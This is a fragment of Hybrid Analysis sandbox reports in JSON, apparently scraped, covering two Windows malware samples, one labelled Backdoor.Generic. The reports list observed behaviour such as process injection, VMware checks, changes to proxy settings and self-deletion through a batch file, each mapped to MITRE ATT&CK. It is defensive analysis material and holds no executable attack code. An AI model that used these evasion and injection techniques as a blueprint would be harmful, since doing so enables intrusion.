(UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter AdmTmpl.dll (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter Adobe (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"FindNextFileW\" with parameter adprovider.dll (UID: 00000000-00005940)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-188", "relevance": 5, "name": "Calls APIs used for Remove Service", "description": "Observed import api \"DeleteService\" which can \"Deregister service in Service Control Manager database\" [Source: f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c]\n Observed import api \"DeleteService\" which can \"Deregister service in Service Control Manager database\" [Source: regsrv32.exe]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"cmd.exe\" marked \"C:\\f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" for deletion\n \"cmd.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2473.bat\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" with delete access\n \"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2473.bat\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" reads file \"C:\\Users\\%OSUSER%\\Searches\\desktop.ini\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" reads file \"C:\\Users\\%OSUSER%\\Videos\\desktop.ini\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" reads file \"C:\\Users\\%OSUSER%\\Pictures\\desktop.ini\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" reads file \"C:\\Users\\%OSUSER%\\Contacts\\desktop.ini\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" reads file \"C:\\Users\\%OSUSER%\\Favorites\\desktop.ini\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" reads file \"C:\\Users\\%OSUSER%\\Music\\desktop.ini\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" reads file \"C:\\Users\\%OSUSER%\\Downloads\\desktop.ini\"\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-3", "relevance": 10, "name": "Timestamp in PE header is very old or in the future", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c\" claims program is from Thu Jan 1 15:30:08 1970\n \"regsrv32.exe\" claims program is from Thu Jan 1 15:30:08 1970", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c\" has an entrypoint in section \"UPX0\"\n \"regsrv32.exe\" has an entrypoint in section \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"regsrv32.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\regsrv32.exe]- [targetUID: 00000000-00005940]\n \"REGSRV32.EXE.67A9C472.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c\" has section name UPX0 with entropy \"6.33637327379\"\n \"regsrv32.exe\" has section name UPX0 with entropy \"6.33637327379\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "target-423", "type": 9, "relevance": 5, "name": "Tries to access/write temporary files", "description": "Process \"%WINDIR%\\system32\\cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\r2473.bat\" \"\" (UID: 00000000-00004236)", "origin": "Monitored Target", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00005940)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"Process32NextW with parameter WmiPrvSE.exe\" (UID: 00000000-00005940)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" called \"ShellExecuteA\" with parameter %TEMP%\\r2473.bat (UID: 00000000-00005940)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\regsrv32.exe\" (Handle: 472)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\regsrv32.exe\" (Handle: 472)\n \"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\regsrv32.exe\" (Handle: 472)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" allocated memory in \"C:\\f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Environment Awareness", "identifier": "registry-56", "type": 3, "relevance": 5, "name": "Reads the registry for VMWare specific artifacts", "description": "\"f489e33d812f81d343ba0fc6837db386d06f3d7afd3b42c6136da690e466548c.exe\" (Path: \"HKLM\\SOFTWARE\\VMWARE, INC.\\VMWARE TOOLS\")\n \"regsrv32.exe\" (Path: \"HKLM\\SOFTWARE\\VMWARE, INC.\\VMWARE TOOLS\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895
https://hybrid-analysis.com/sample/625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895
Hybrid Analysis - Killers
{"size": 614400, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895", "sha256": "625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895", "av_detect": 93, "vx_family": "Backdoor.Generic", "threat_score": 72, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 121, "extracted_files": [{"name": "gegdsimsogm.exe", "file_path": "%TEMP%\\gegdsimsogm.exe", "file_size": 327680, "sha256": "c860d24345678496431c86319cd21107870182821ad98af97ec1165af54d9de8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe (PID: 6024)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 7.10 (Visual Studio .NET 2003) (build: 3077)", "1 .RES Files linked with CVTRES.EXE 7.10 (Visual Studio .NET 2003) (build: 3052)", "3 .CPP Files compiled with CL.EXE 13.10 (Visual Studio .NET 2003) (build: 3077)"], "imported_objects": ["3 .LIB Files generated with LIB.EXE 7.10 (Visual Studio .NET 2003) (build: 2179)", "2 .LIB Files generated with LIB.EXE 7.00 (Visual Studio .NET 2002) (build: 9210)", "12 .ASM Files assembled with MASM 7.10 (Visual Studio .NET 2002) (build: 3077)", "41 .C Files compiled with CL.EXE 13.10 (Visual Studio .NET 2003) (build: 3077)", "1 .OBJ Files linked with ALIASOBJ.EXE 7.10 BETA (Internal OLDNAMES.LIB Tool) (build: 2067)"], "file_analysis": ["File contains C++ code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (3 files)"], "total_file_compositions_imports": 61}, "processes": [{"uid": "00000000-00006024", "name": "625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe", "normalized_path": "C:\\625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895.exe", "sha256": "625b374340b41ef873cd09b09719bd85d778d15c530e4e87c60f52ea5879b895", "av_label": "Backdoor.Generic", "av_matched": 17, "av_total": 22}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox 